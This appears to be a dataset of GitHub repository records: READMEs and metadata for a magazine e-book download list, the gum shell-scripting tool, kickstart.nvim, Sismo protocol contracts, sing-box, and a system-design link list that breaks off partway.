ๆฏๆœˆ2ๅทๆ›ดๆ–ฐ **ๅฆ‚ไฝ•้€‰ๆ‹ฉๆ‚ๅฟ— ? ่ฏทๅ‚่€ƒไธ‹้ขไธค็ฏ‡ๆ–‡็ซ ** * [่€ƒ็ ”่‹ฑ่ฏญ้ข˜ๆบๅˆ†ๆž๏ผŒ็œ‹็œ‹้ข˜็›ฎๆฅ่‡ชไบŽๅ“ช้‡Œ](https://zhuanlan.zhihu.com/p/25051680) * [2018่‹ฑ่ฏญๅค–ๅˆŠๅคงๅˆ้›†](https://zhuanlan.zhihu.com/p/54181221) ------------------------------------- ## ไธ‰ใ€ๅ…ถไป–้˜…่ฏปๅ™จ 1. epub ๆ ผๅผ็š„็”ตๅญไนฆๅฏไปฅๅฎ‰่ฃ… [ๅคš็œ‹้˜…่ฏป](https://www.duokan.com/product) , ้€š่ฟ‡ `wifiไผ ไนฆๅŠŸ่ƒฝ` ้€š่ฟ‡ๆต่งˆๅ™จๅฐ†็”ตๅญไนฆไผ ๅ…ฅๅˆฐ้˜…่ฏปๅ™จไธญ, ็„ถๅŽๅฐฑๅฏไปฅ่ฟ›่กŒ้˜…่ฏป; 2. mobi ๆ ผๅผ็š„็”ตๅญไนฆ้œ€่ฆไฝฟ็”จ `kindle่ฎพๅค‡` ๆˆ–่€…ๅœจ็”ต่„‘ใ€ๆ‰‹ๆœบไธŠๅฎ‰่ฃ… [kindle ้˜…่ฏปapp](https://www.amazon.cn/kindle-dbs/fd/kcp/ref=sv_kinc_0)
็ปๆตŽๅญฆไบบ(ๅซ้Ÿณ้ข‘)ใ€็บฝ็บฆๅฎขใ€ๅซๆŠฅใ€่ฟž็บฟใ€ๅคง่ฅฟๆด‹ๆœˆๅˆŠ็ญ‰่‹ฑ่ฏญๆ‚ๅฟ—ๅ…่ดนไธ‹่ฝฝ,ๆ”ฏๆŒepubใ€mobiใ€pdfๆ ผๅผ, ๆฏๅ‘จๆ›ดๆ–ฐ
download,ebooks,economist,economist-ebooks,new-yorker,pdf
0
1
3
114
0
1
0
charmbracelet/gum
Gum === <p> <a href="https://stuff.charm.sh/gum/nutritional-information.png" target="_blank"><img src="https://stuff.charm.sh/gum/gum.png" alt="Gum Image" width="450" /></a> <br><br> <a href="https://github.com/charmbracelet/gum/releases"><img src="https://img.shields.io/github/release/charmbracelet/gum.svg" alt="Latest Release"></a> <a href="https://pkg.go.dev/github.com/charmbracelet/gum?tab=doc"><img src="https://godoc.org/github.com/golang/gddo?status.svg" alt="Go Docs"></a> <a href="https://github.com/charmbracelet/gum/actions"><img src="https://github.com/charmbracelet/gum/workflows/build/badge.svg" alt="Build Status"></a> </p> A tool for glamorous shell scripts. Leverage the power of [Bubbles](https://github.com/charmbracelet/bubbles) and [Lip Gloss](https://github.com/charmbracelet/lipgloss) in your scripts and aliases without writing any Go code! <img alt="Shell running the ./demo.sh script" width="600" src="https://vhs.charm.sh/vhs-1qY57RrQlXCuydsEgDp68G.gif"> The above example is running from a single shell script ([source](./examples/demo.sh)). ## Tutorial Gum provides highly configurable, ready-to-use utilities to help you write useful shell scripts and dotfiles aliases with just a few lines of code. Let's build a simple script to help you write [Conventional Commits](https://www.conventionalcommits.org/en/v1.0.0/#summary) for your dotfiles. Ask for the commit type with gum choose: ```bash gum choose "fix" "feat" "docs" "style" "refactor" "test" "chore" "revert" ``` > [!NOTE] > This command itself will print to stdout which is not all that useful. To make use of the command later on you can save the stdout to a `$VARIABLE` or `file.txt`. Prompt for the scope of these changes: ```bash gum input --placeholder "scope" ``` Prompt for the summary and description of changes: ```bash gum input --value "$TYPE$SCOPE: " --placeholder "Summary of this change" gum write --placeholder "Details of this change" ``` Confirm before committing: ```bash gum confirm "Commit changes?" && git commit -m "$SUMMARY" -m "$DESCRIPTION" ``` Check out the [complete example](https://github.com/charmbracelet/gum/blob/main/examples/commit.sh) for combining these commands in a single script. 
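Putting those pieces together, here is a minimal end-to-end sketch of such a script (the variable wiring below is illustrative and simplified, not a verbatim copy of the linked `commit.sh`):

```bash
#!/usr/bin/env bash
# Capture each answer in a variable so the final commit can reuse it.
TYPE=$(gum choose "fix" "feat" "docs" "style" "refactor" "test" "chore" "revert")
SCOPE=$(gum input --placeholder "scope")
# Wrap the scope in parentheses only when one was provided.
test -n "$SCOPE" && SCOPE="($SCOPE)"
SUMMARY=$(gum input --value "$TYPE$SCOPE: " --placeholder "Summary of this change")
DESCRIPTION=$(gum write --placeholder "Details of this change")
gum confirm "Commit changes?" && git commit -m "$SUMMARY" -m "$DESCRIPTION"
```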
<img alt="Running the ./examples/commit.sh script to commit to git" width="600" src="https://vhs.charm.sh/vhs-7rRq3LsEuJVwhwr0xf6Er7.gif"> ## Installation Use a package manager: ```bash # macOS or Linux brew install gum # Arch Linux (btw) pacman -S gum # Nix nix-env -iA nixpkgs.gum # Windows (via WinGet or Scoop) winget install charmbracelet.gum scoop install charm-gum ``` <details> <summary>Debian/Ubuntu</summary> ```bash sudo mkdir -p /etc/apt/keyrings curl -fsSL https://repo.charm.sh/apt/gpg.key | sudo gpg --dearmor -o /etc/apt/keyrings/charm.gpg echo "deb [signed-by=/etc/apt/keyrings/charm.gpg] https://repo.charm.sh/apt/ * *" | sudo tee /etc/apt/sources.list.d/charm.list sudo apt update && sudo apt install gum ``` </details> <details> <summary>Fedora/RHEL</summary> ```bash echo '[charm] name=Charm baseurl=https://repo.charm.sh/yum/ enabled=1 gpgcheck=1 gpgkey=https://repo.charm.sh/yum/gpg.key' | sudo tee /etc/yum.repos.d/charm.repo sudo yum install gum ``` </details> Or download it: * [Packages][releases] are available in Debian, RPM, and Alpine formats * [Binaries][releases] are available for Linux, macOS, Windows, FreeBSD, OpenBSD, and NetBSD Or just install it with `go`: ```bash go install github.com/charmbracelet/gum@latest ``` [releases]: https://github.com/charmbracelet/gum/releases ## Commands * [`choose`](#choose): Choose an option from a list of choices * [`confirm`](#confirm): Ask a user to confirm an action * [`file`](#file): Pick a file from a folder * [`filter`](#filter): Filter items from a list * [`format`](#format): Format a string using a template * [`input`](#input): Prompt for some input * [`join`](#join): Join text vertically or horizontally * [`pager`](#pager): Scroll through a file * [`spin`](#spin): Display spinner while running a command * [`style`](#style): Apply coloring, borders, spacing to text * [`table`](#table): Render a table of data * [`write`](#write): Prompt for long-form text * [`log`](#log): Log messages to output ## Customization You can customize `gum` options and styles with `--flags` and `$ENVIRONMENT_VARIABLES`. See `gum <command> --help` for a full view of each command's customization and configuration options. Customize with `--flags`: ```bash gum input --cursor.foreground "#FF0" \ --prompt.foreground "#0FF" \ --placeholder "What's up?" \ --prompt "* " \ --width 80 \ --value "Not much, hby?" ``` Customize with `ENVIRONMENT_VARIABLES`: ```bash export GUM_INPUT_CURSOR_FOREGROUND="#FF0" export GUM_INPUT_PROMPT_FOREGROUND="#0FF" export GUM_INPUT_PLACEHOLDER="What's up?" export GUM_INPUT_PROMPT="* " export GUM_INPUT_WIDTH=80 # --flags can override values set with environment gum input ``` <img alt="Gum input displaying most customization options" width="600" src="https://vhs.charm.sh/vhs-5zb9DlQYA70aL9ZpYLTwKv.gif"> ## Input Prompt for input with a simple command. ```bash gum input > answer.txt gum input --password > password.txt ``` <img src="https://vhs.charm.sh/vhs-1nScrStFI3BMlCp5yrLtyg.gif" width="600" alt="Shell running gum input typing Not much, you?" /> ## Write Prompt for some multi-line text (`ctrl+d` to complete text entry). 
```bash gum write > story.txt ``` <img src="https://vhs.charm.sh/vhs-7abdKKrUEukgx9aJj8O5GX.gif" width="600" alt="Shell running gum write typing a story" /> ## Filter Filter a list of values with fuzzy matching: ```bash echo Strawberry >> flavors.txt echo Banana >> flavors.txt echo Cherry >> flavors.txt gum filter < flavors.txt > selection.txt ``` <img src="https://vhs.charm.sh/vhs-61euOQtKPtQVD7nDpHQhzr.gif" width="600" alt="Shell running gum filter on different bubble gum flavors" /> Select multiple options with the `--limit` flag or `--no-limit` flag. Use `tab` or `ctrl+space` to select, `enter` to confirm. ```bash cat flavors.txt | gum filter --limit 2 cat flavors.txt | gum filter --no-limit ``` ## Choose Choose an option from a list of choices. ```bash echo "Pick a card, any card..." CARD=$(gum choose --height 15 {{A,K,Q,J},{10..2}}" "{โ™ ,โ™ฅ,โ™ฃ,โ™ฆ}) echo "Was your card the $CARD?" ``` You can also select multiple items with the `--limit` or `--no-limit` flag, which determines the maximum number of items that can be chosen. ```bash cat songs.txt | gum choose --limit 5 cat foods.txt | gum choose --no-limit --header "Grocery Shopping" ``` <img src="https://vhs.charm.sh/vhs-3zV1LvofA6Cbn5vBu1NHHl.gif" width="600" alt="Shell running gum choose with numbers and gum flavors" /> ## Confirm Confirm whether to perform an action. Exits with code `0` (affirmative) or `1` (negative) depending on selection. ```bash gum confirm && rm file.txt || echo "File not removed" ``` <img src="https://vhs.charm.sh/vhs-3xRFvbeQ4lqGerbHY7y3q2.gif" width="600" alt="Shell running gum confirm" /> ## File Prompt the user to select a file from the file tree. ```bash $EDITOR $(gum file $HOME) ``` <img src="https://vhs.charm.sh/vhs-2RMRqmnOPneneIgVJJ3mI1.gif" width="600" alt="Shell running gum file" /> ## Pager Scroll through a long document with line numbers and a fully customizable viewport. ```bash gum pager < README.md ``` <img src="https://vhs.charm.sh/vhs-3iMDpgOLmbYr0jrYEGbk7p.gif" width="600" alt="Shell running gum pager" /> ## Spin Display a spinner while running a script or command. The spinner will automatically stop after the given command exits. To view or pipe the command's output, use the `--show-output` flag. ```bash gum spin --spinner dot --title "Buying Bubble Gum..." -- sleep 5 ``` <img src="https://vhs.charm.sh/vhs-3YFswCmoY4o3Q7MyzWl6sS.gif" width="600" alt="Shell running gum spin while sleeping for 5 seconds" /> Available spinner types include: `line`, `dot`, `minidot`, `jump`, `pulse`, `points`, `globe`, `moon`, `monkey`, `meter`, `hamburger`. ## Table Select a row from some tabular data. ```bash gum table < flavors.csv | cut -d ',' -f 1 ``` <!-- <img src="https://stuff.charm.sh/gum/table.gif" width="600" alt="Shell running gum table" /> --> ## Style Pretty print any string with any layout with one command. ```bash gum style \ --foreground 212 --border-foreground 212 --border double \ --align center --width 50 --margin "1 2" --padding "2 4" \ 'Bubble Gum (1ยข)' 'So sweet and so fresh!' ``` <img src="https://github.com/charmbracelet/gum/assets/42545625/67468acf-b3e0-4e78-bd89-360739eb44fa" width="600" alt="Bubble Gum, So sweet and so fresh!" /> ## Join Combine text vertically or horizontally. Use this command with `gum style` to build layouts and pretty output. Tip: Always wrap the output of `gum style` in quotes to preserve newlines (`\n`) when using it as an argument in the `join` command. 
```bash I=$(gum style --padding "1 5" --border double --border-foreground 212 "I") LOVE=$(gum style --padding "1 4" --border double --border-foreground 57 "LOVE") BUBBLE=$(gum style --padding "1 8" --border double --border-foreground 255 "Bubble") GUM=$(gum style --padding "1 5" --border double --border-foreground 240 "Gum") I_LOVE=$(gum join "$I" "$LOVE") BUBBLE_GUM=$(gum join "$BUBBLE" "$GUM") gum join --align center --vertical "$I_LOVE" "$BUBBLE_GUM" ``` <img src="https://github.com/charmbracelet/gum/assets/42545625/68f7a25d-b495-48dd-982a-cee0c8ea5786" width="600" alt="I LOVE Bubble Gum written out in four boxes with double borders around them." /> ## Format `format` processes and formats bodies of text. `gum format` can parse markdown, template strings, and named emojis. ```bash # Format some markdown gum format -- "# Gum Formats" "- Markdown" "- Code" "- Template" "- Emoji" echo "# Gum Formats\n- Markdown\n- Code\n- Template\n- Emoji" | gum format # Syntax highlight some code cat main.go | gum format -t code # Render text any way you want with templates echo '{{ Bold "Tasty" }} {{ Italic "Bubble" }} {{ Color "99" "0" " Gum " }}' \ | gum format -t template # Display your favorite emojis! echo 'I :heart: Bubble Gum :candy:' | gum format -t emoji ``` For more information on template helpers, see the [Termenv docs](https://github.com/muesli/termenv#template-helpers). For a full list of named emojis see the [GitHub API](https://api.github.com/emojis). <img src="https://github.com/charmbracelet/gum/assets/42545625/5cfbb0c8-0022-460d-841b-fec37527ca66" width="300" alt="Running gum format for different types of formats" /> ## Log `log` logs messages to the terminal using different levels and styling, via the [`charmbracelet/log`](https://github.com/charmbracelet/log) library. ```bash # Log some debug information. gum log --structured --level debug "Creating file..." name file.txt # DEBUG Creating file... name=file.txt # Log an error. gum log --structured --level error "Unable to create file." name file.txt # ERROR Unable to create file. name=file.txt # Include a timestamp. gum log --time rfc822 --level error "Unable to create file." ``` See the Go [`time` package](https://pkg.go.dev/time#pkg-constants) for acceptable `--time` formats. See [`charmbracelet/log`](https://github.com/charmbracelet/log) for more usage. <img src="https://vhs.charm.sh/vhs-6jupuFM0s2fXiUrBE0I1vU.gif" width="600" alt="Running gum log with debug and error levels" /> ## Examples How to use `gum` in your daily workflows: See the [examples](./examples/) directory for more real-world use cases. * Write a commit message: ```bash git commit -m "$(gum input --width 50 --placeholder "Summary of changes")" \ -m "$(gum write --width 80 --placeholder "Details of changes")" ``` * Open files in your `$EDITOR` ```bash $EDITOR $(gum filter) ``` * Connect to a `tmux` session ```bash SESSION=$(tmux list-sessions -F \#S | gum filter --placeholder "Pick session...") tmux switch-client -t $SESSION || tmux attach -t $SESSION ``` * Pick a commit hash from `git` history ```bash git log --oneline | gum filter | cut -d' ' -f1 # | copy ``` * Simple [`skate`](https://github.com/charmbracelet/skate) password selector. 
```bash skate list -k | gum filter | xargs skate get ``` * Uninstall packages ```bash brew list | gum choose --no-limit | xargs brew uninstall ``` * Clean up `git` branches ```bash git branch | cut -c 3- | gum choose --no-limit | xargs git branch -D ``` * Checkout GitHub pull requests with [`gh`](https://cli.github.com/) ```bash gh pr list | cut -f1,2 | gum choose | cut -f1 | xargs gh pr checkout ``` * Copy command from shell history ```bash gum filter < $HISTFILE --height 20 ``` * `sudo` replacement ```bash alias please="gum input --password | sudo -nS" ``` ## Feedback Weโ€™d love to hear your thoughts on this project. Feel free to drop us a note! * [Twitter](https://twitter.com/charmcli) * [The Fediverse](https://mastodon.social/@charmcli) * [Discord](https://charm.sh/chat) ## License [MIT](https://github.com/charmbracelet/gum/raw/main/LICENSE) *** Part of [Charm](https://charm.sh). <a href="https://charm.sh/"><img alt="The Charm logo" src="https://stuff.charm.sh/charm-badge.jpg" width="400" /></a> Charm็ƒญ็ˆฑๅผ€ๆบ โ€ข Charm loves open source
A tool for glamorous shell scripts ๐ŸŽ€
bash,shell
15
51
252
447
139
5
5
nvim-lua/kickstart.nvim
# kickstart.nvim ## Introduction A starting point for Neovim that is: * Small * Single-file * Completely Documented **NOT** a Neovim distribution, but instead a starting point for your configuration. ## Installation ### Install Neovim Kickstart.nvim targets *only* the latest ['stable'](https://github.com/neovim/neovim/releases/tag/stable) and latest ['nightly'](https://github.com/neovim/neovim/releases/tag/nightly) of Neovim. If you are experiencing issues, please make sure you have the latest versions. ### Install External Dependencies External Requirements: - Basic utils: `git`, `make`, `unzip`, C Compiler (`gcc`) - [ripgrep](https://github.com/BurntSushi/ripgrep#installation) - Clipboard tool (xclip/xsel/win32yank or other depending on platform) - A [Nerd Font](https://www.nerdfonts.com/): optional, provides various icons; if you have one, set `vim.g.have_nerd_font` in `init.lua` to true - Language Setup: - If you want to write TypeScript, you will need `npm` - If you want to write Golang, you will need `go` - etc. > **NOTE** > See [Install Recipes](#Install-Recipes) for additional Windows and Linux specific notes > and quick install snippets ### Install Kickstart > **NOTE** > [Backup](#FAQ) your previous configuration (if any exists) Neovim's configurations are located under the following paths, depending on your OS: | OS | PATH | | :- | :--- | | Linux, macOS | `$XDG_CONFIG_HOME/nvim`, `~/.config/nvim` | | Windows (cmd)| `%userprofile%\AppData\Local\nvim\` | | Windows (powershell)| `$env:USERPROFILE\AppData\Local\nvim\` | #### Recommended Step [Fork](https://docs.github.com/en/get-started/quickstart/fork-a-repo) this repo so that you have your own copy that you can modify, then install by cloning the fork to your machine using one of the commands below, depending on your OS. > **NOTE** > Your fork's url will be something like this: > `https://github.com/<your_github_username>/kickstart.nvim.git` #### Clone kickstart.nvim > **NOTE** > If following the recommended step above (i.e., forking the repo), replace > `nvim-lua` with `<your_github_username>` in the commands below <details><summary> Linux and Mac </summary> ```sh git clone https://github.com/nvim-lua/kickstart.nvim.git "${XDG_CONFIG_HOME:-$HOME/.config}"/nvim ``` </details> <details><summary> Windows </summary> If you're using `cmd.exe`: ``` git clone https://github.com/nvim-lua/kickstart.nvim.git %userprofile%\AppData\Local\nvim\ ``` If you're using `powershell.exe` ``` git clone https://github.com/nvim-lua/kickstart.nvim.git $env:USERPROFILE\AppData\Local\nvim\ ``` </details> ### Post Installation Start Neovim ```sh nvim ``` That's it! Lazy will install all the plugins you have. Use `:Lazy` to view the current plugin status. Hit `q` to close the window. Read through the `init.lua` file in your configuration folder for more information about extending and exploring Neovim. That also includes examples of adding popularly requested plugins. ### Getting Started [The Only Video You Need to Get Started with Neovim](https://youtu.be/m8C0Cq9Uv9o) ### FAQ * What should I do if I already have a pre-existing Neovim configuration? * You should back it up and then delete all associated files. * This includes your existing `init.lua` and the Neovim files in `~/.local` which can be deleted with `rm -rf ~/.local/share/nvim/` * Can I keep my existing configuration in parallel to kickstart? * Yes! You can use [NVIM_APPNAME](https://neovim.io/doc/user/starting.html#%24NVIM_APPNAME)`=nvim-NAME` to maintain multiple configurations. 
For example, you can install the kickstart configuration in `~/.config/nvim-kickstart` and create an alias: ``` alias nvim-kickstart='NVIM_APPNAME="nvim-kickstart" nvim' ``` When you run Neovim using the `nvim-kickstart` alias it will use the alternative config directory and the matching local directory `~/.local/share/nvim-kickstart`. You can apply this approach to any Neovim distribution that you would like to try out. * What if I want to "uninstall" this configuration: * See [lazy.nvim uninstall](https://github.com/folke/lazy.nvim#-uninstalling) information * Why is the kickstart `init.lua` a single file? Wouldn't it make sense to split it into multiple files? * The main purpose of kickstart is to serve as a teaching tool and a reference configuration that someone can easily use to `git clone` as a basis for their own. As you progress in learning Neovim and Lua, you might consider splitting `init.lua` into smaller parts. A fork of kickstart that does this while maintaining the same functionality is available here: * [kickstart-modular.nvim](https://github.com/dam9000/kickstart-modular.nvim) * Discussions on this topic can be found here: * [Restructure the configuration](https://github.com/nvim-lua/kickstart.nvim/issues/218) * [Reorganize init.lua into a multi-file setup](https://github.com/nvim-lua/kickstart.nvim/pull/473) ### Install Recipes Below you can find OS-specific install instructions for Neovim and dependencies. After installing all the dependencies continue with the [Install Kickstart](#Install-Kickstart) step. #### Windows Installation <details><summary>Windows with Microsoft C++ Build Tools and CMake</summary> Installation may require installing build tools and updating the run command for `telescope-fzf-native` See `telescope-fzf-native` documentation for [more details](https://github.com/nvim-telescope/telescope-fzf-native.nvim#installation) This requires: - Install CMake and the Microsoft C++ Build Tools on Windows ```lua {'nvim-telescope/telescope-fzf-native.nvim', build = 'cmake -S. -Bbuild -DCMAKE_BUILD_TYPE=Release && cmake --build build --config Release && cmake --install build --prefix build' } ``` </details> <details><summary>Windows with gcc/make using chocolatey</summary> Alternatively, one can install gcc and make, which don't require changing the config; the easiest way is to use choco: 1. install [chocolatey](https://chocolatey.org/install): either follow the instructions on the page or use winget; run in cmd as **admin**: ``` winget install --accept-source-agreements chocolatey.chocolatey ``` 2. 
install all requirements using choco, exit previous cmd and open a new one so that choco path is set, and run in cmd as **admin**: ``` choco install -y neovim git ripgrep wget fd unzip gzip mingw make ``` </details> <details><summary>WSL (Windows Subsystem for Linux)</summary> ``` wsl --install wsl sudo add-apt-repository ppa:neovim-ppa/unstable -y sudo apt update sudo apt install make gcc ripgrep unzip git xclip neovim ``` </details> #### Linux Install <details><summary>Ubuntu Install Steps</summary> ``` sudo add-apt-repository ppa:neovim-ppa/unstable -y sudo apt update sudo apt install make gcc ripgrep unzip git xclip neovim ``` </details> <details><summary>Debian Install Steps</summary> ``` sudo apt update sudo apt install make gcc ripgrep unzip git xclip curl # Now we install nvim curl -LO https://github.com/neovim/neovim/releases/latest/download/nvim-linux64.tar.gz sudo rm -rf /opt/nvim-linux64 sudo mkdir -p /opt/nvim-linux64 sudo chmod a+rX /opt/nvim-linux64 sudo tar -C /opt -xzf nvim-linux64.tar.gz # make it available in /usr/local/bin, distro installs to /usr/bin sudo ln -sf /opt/nvim-linux64/bin/nvim /usr/local/bin/ ``` </details> <details><summary>Fedora Install Steps</summary> ``` sudo dnf install -y gcc make git ripgrep fd-find unzip neovim ``` </details> <details><summary>Arch Install Steps</summary> ``` sudo pacman -S --noconfirm --needed gcc make git ripgrep fd unzip neovim ``` </details>
A launch point for your personal nvim configuration
null
0
113
563
277
13
13
1
sismo-core/sismo-badges
<br /> <div align="center"> <img src="docs/top.png" alt="Logo" width="100" height="100" style="borderRadius: 20px"> <h3 align="center"> Sismo Protocol Contracts </h3> <p align="center"> Made by <a href="https://www.sismo.io/" target="_blank">Sismo</a> </p> <p align="center"> <a href="https://discord.gg/sismo" target="_blank"> <img src="https://img.shields.io/badge/Discord-7289DA?style=for-the-badge&logo=discord&logoColor=white"/> </a> <a href="https://twitter.com/sismo_eth" target="_blank"> <img src="https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white"/> </a> </p> <a href="https://www.sismo.io/" target="_blank"> </a> </div> <br/> This repository contains the smart contracts of the Sismo Protocol. There are three core contracts: - `core/AttestationsRegistry.sol`: The registry stores all attestations. It is owned by the governance, which authorizes/unauthorizes issuers to record in it - `core/Attester.sol`: The standard abstract contract that must be inherited by attesters. Attesters are issuers of attestations. They verify user requests and build attestations that will be recorded in the registry - `core/Badges.sol`: Reads the registry. A stateless, non-transferable token view of attestations (ERC1155) It also contains implementations of attesters in `attesters/`: - `HydraS1SimpleAttester.sol`: A ZK attester using the [Hydra S1 Proving Scheme](https://hydra-s1.docs.sismo.io) and the notion of nullifiers. Users must provide a ZK proof along with their request to generate attestations - `HydraS1AccountboundAttester.sol`: An account-bound version of the Hydra S1 Simple Attester. (Users can update at will where the attestation is stored) <br/><br/> ## Sismo protocol A complete overview of the protocol is available in our [documentation](https://protocol.docs.sismo.io) ## Deployed contracts Deployed contracts can be found [here](https://docs.sismo.io/sismo-docs/deployed-contract-addresses) ## Usage ### Installation ``` yarn ``` ### Compile contracts Compile contracts using Hardhat ``` yarn compile ``` ### Test Launch all tests ``` yarn test ``` ### Print storage layout ``` yarn storage-layout ``` ### Deploy on local chain Terminal tab 1 ``` yarn chain ``` Terminal tab 2 ``` yarn deploy:local ``` ## Create a new Attester To develop a new attester, you must inherit the `core/Attester.sol` abstract contract and implement the following functions: - `_verifyRequest(request, proofData)`: You must implement the verification of the user request against the proof provided by the user - `buildAttestations(request, proofData)`: You must build the attestations that will be recorded from a verified user request Other optional hook functions that can be implemented: - `_beforeRecordAttestations(request, proofData)` - `_afterRecordAttestations(request, proofData)` The `/attesters/hydra-s1/HydraS1SimpleAttester.sol` contract is a good example of an attester implementing those functions. A [guide](https://attesters.docs.sismo.io) is offered in our documentation. Feel free to open a PR with your new attester in `/attesters`! ## License Distributed under the MIT License. ## Contribute Please feel free to open issues or PRs, or simply provide feedback! ## Contact Prefer [Discord](https://discord.gg/sismo) or [Twitter](https://twitter.com/sismo_eth) <br/> <img src="https://static.sismo.io/readme/bottom-main.png" alt="bottom" width="100%" >
Contracts of the Sismo Badge Minting Protocol
did,ethereum,zkp,attestations,smart-contracts
29
7
69
307
1
32
2
SagerNet/sing-box
# sing-box The universal proxy platform. [![Packaging status](https://repology.org/badge/vertical-allrepos/sing-box.svg)](https://repology.org/project/sing-box/versions) ## Documentation https://sing-box.sagernet.org ## Support https://community.sagernet.org/c/sing-box/ ## License ``` Copyright (C) 2022 by nekohasekai <contact-sagernet@sekai.icu> This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. In addition, no derivative work may use the name or imply association with this application without prior consent. ```
The universal proxy platform
null
268
60
306
1,394
46
26
5
InterviewReady/system-design-resources
# System Design Resources These are the best resources for System Design on the Internet. # Table of Contents - [Video Processing](#video-processing) - [Cluster and Workflow Management](#cluster-and-workflow-management) - [Intra-Service Messaging](#intra-service-messaging) - [Message Queue Antipattern](#message-queue-antipattern) - [Service Mesh](#service-mesh) - [Practical System Design](#practical-system-design) - [Distributed File System](#distributed-file-system) - [Time Series Databases](#time-series-databases) - [Rate Limiting](#rate-limiting) - [In Memory Database - Redis](#in-memory-database---redis) - [Network Protocols](#network-protocols) - [Chess Engine Design](#chess-engine-design) - [Subscription Management System](#subscription-management-system) - [Google Docs](#google-docs) - [API Design](#api-design) - [NoSQL Database Internals](#nosql-database-internals) - [NoSQL Database Algorithms](#nosql-database-algorithms) - [Database Replication](#database-replication) - [Containers and Docker](#containers-and-docker) - [Capacity Estimation](#capacity-estimation) - [Publisher Subscriber](#publisher-subscriber) - [Event Driven Architectures](#event-driven-architectures) - [Software Architectures](#software-architectures) - [Microservices](#microservices) - [Distributed Transactions consistency Patterns](#distributed-transactions-consistency-patterns) - [Load Balancing](#load-balancing) - [Alerts and Anomaly Detection](#alerts-and-anomaly-detection) - [Distributed Logging](#distributed-logging) - [Metrics and Text Search Engine](#metrics-and-text-search-engine) - [Single Point of Failure](#single-point-of-failure) - [Location Based Services](#location-based-services) - [Batch Processing](#batch-processing) - [Real Time Stream Processing](#real-time-stream-processing) - [Caching](#caching) - [Distributed Consensus](#distributed-consensus) - [Authorization](#authorization) - [Content Delivery Network](#content-delivery-network) - [Testing Distributed Systems](#testing-distributed-systems) - [System Design Resources](#system-design-resources) ## ## Video Processing - [Transcoding Videos at Scale](https://www.egnyte.com/blog/2018/12/transcoding-how-we-serve-videos-at-scale/) - [Facebook Video Broadcasting](https://engineering.fb.com/ios/under-the-hood-broadcasting-live-video-to-millions/) - [Netflix Video Encoding at Scale](https://netflixtechblog.com/high-quality-video-encoding-at-scale-d159db052746) - [Netflix Shot based encoding](https://netflixtechblog.com/optimized-shot-based-encodes-now-streaming-4b9464204830) ## ## Cluster and Workflow Management - [Facebook Cluster Management](https://engineering.fb.com/data-center-engineering/twine/) - [Google Autopilot - Autoscaling](https://dl.acm.org/doi/pdf/10.1145/3342195.3387524) - [Netflix Workflow Orchestration](https://netflix.github.io/conductor/) - [Opensource Workflow Management](https://github.com/spotify/luigi) - [Meta Hardware Management](https://engineering.fb.com/2020/12/09/data-center-engineering/how-facebook-keeps-its-large-scale-infrastructure-hardware-up-and-running/) - [Meta Capacity Assignment](https://engineering.fb.com/2022/09/06/data-center-engineering/viewing-the-world-as-a-computer-global-capacity-management/) - [Amazon EC2](https://www.allthingsdistributed.com/2015/07/under-the-hood-of-the-amazon-ec2-container-service.html) ## ## Intra-Service Messaging - [What is a message queue](https://www.cloudamqp.com/blog/what-is-message-queuing.html) - [AirBnb 
Idempotency](https://medium.com/airbnb-engineering/avoiding-double-payments-in-a-distributed-payments-system-2981f6b070bb) - [Nginx Service Mesh](https://www.nginx.com/learn/service-mesh/) - [Meta Async Task Computing](https://engineering.fb.com/2023/01/31/production-engineering/meta-asynchronous-computing/) ## Message Queue Antipattern - [DB as queue Antipattern](https://en.wikipedia.org/wiki/Database-as-IPC) - [Using a database as a message queue](https://softwareengineering.stackexchange.com/questions/231410/why-database-as-queue-so-bad) - [Anti-pattern of DB as a queue](http://mikehadlow.blogspot.com/2012/04/database-as-queue-anti-pattern.html) - [Drawbacks of DB as a queue](https://www.cloudamqp.com/blog/why-is-a-database-not-the-right-tool-for-a-queue-based-system.html) ## ## Service Mesh - [Kubernetes Service Mesh](https://akomljen.com/kubernetes-service-mesh/) - [Kubernetes Sidecar](https://www.weave.works/blog/introduction-to-service-meshes-on-kubernetes-and-progressive-delivery) - [Service Mesh](https://www.weave.works/blog/introduction-to-service-meshes-on-kubernetes-and-progressive-delivery) - [NginX Service Mesh](https://www.nginx.com/learn/service-mesh/) - [Data Plane and Control Plane](https://blog.envoyproxy.io/service-mesh-data-plane-vs-control-plane-2774e720f7fc) ## ## Practical System Design - [Facebook Messenger Optimisations](https://spectrum.ieee.org/how-facebooks-software-engineers-prepare-messenger-for-new-years-eve) - [YouTube Architecture](http://highscalability.com/youtube-architecture) - [YouTube scalability 2012](https://www.youtube.com/watch?v=w5WVu624fY8) - [Distributed Design Patterns](http://horicky.blogspot.com/2010/10/scalable-system-design-patterns.html) - [Monolith to Microservice](https://martinfowler.com/articles/break-monolith-into-microservices.html) - [Zerodha Tech Stack](https://zerodha.tech/blog/hello-world/) ## ## Distributed File System - [Open Source Distributed File System](https://docs.ceph.com/en/latest/architecture/) - [Amazon S3 Performance hacks](https://aws.amazon.com/blogs/aws/amazon-s3-performance-tips-tricks-seattle-hiring-event/) - [Amazon S3 object expiration](https://aws.amazon.com/blogs/aws/amazon-s3-object-expiration/) ## ## Time Series Databases - [Pinterest Time Series Database](https://medium.com/pinterest-engineering/goku-building-a-scalable-and-high-performant-time-series-database-system-a8ff5758a181) - [Uber Time Series DB](https://eng.uber.com/aresdb/) - [TimeSeries Relational DB](https://blog.timescale.com/blog/time-series-data-why-and-how-to-use-a-relational-database-instead-of-nosql-d0cd6975e87c) - [Facebook Gorilla Time Series DB](http://www.vldb.org/pvldb/vol8/p1816-teller.pdf) ## ## Rate Limiting - [Circuit Breaker Algorithm](https://martinfowler.com/bliki/CircuitBreaker.html) - [Uber Rate Limiter](https://github.com/uber-go/ratelimit/blob/master/ratelimit.go) ## ## In Memory Database - Redis - [Redis Official Documentation](https://redis.com/) - [Learn Redis through Redis University](https://university.redis.com/) - [Redis Open Source Repo](https://github.com/redis/redis) - [Redis Architecture](https://medium.com/opstree-technology/redis-cluster-architecture-replication-sharding-and-failover-86871e783ac0) ## ## Network Protocols 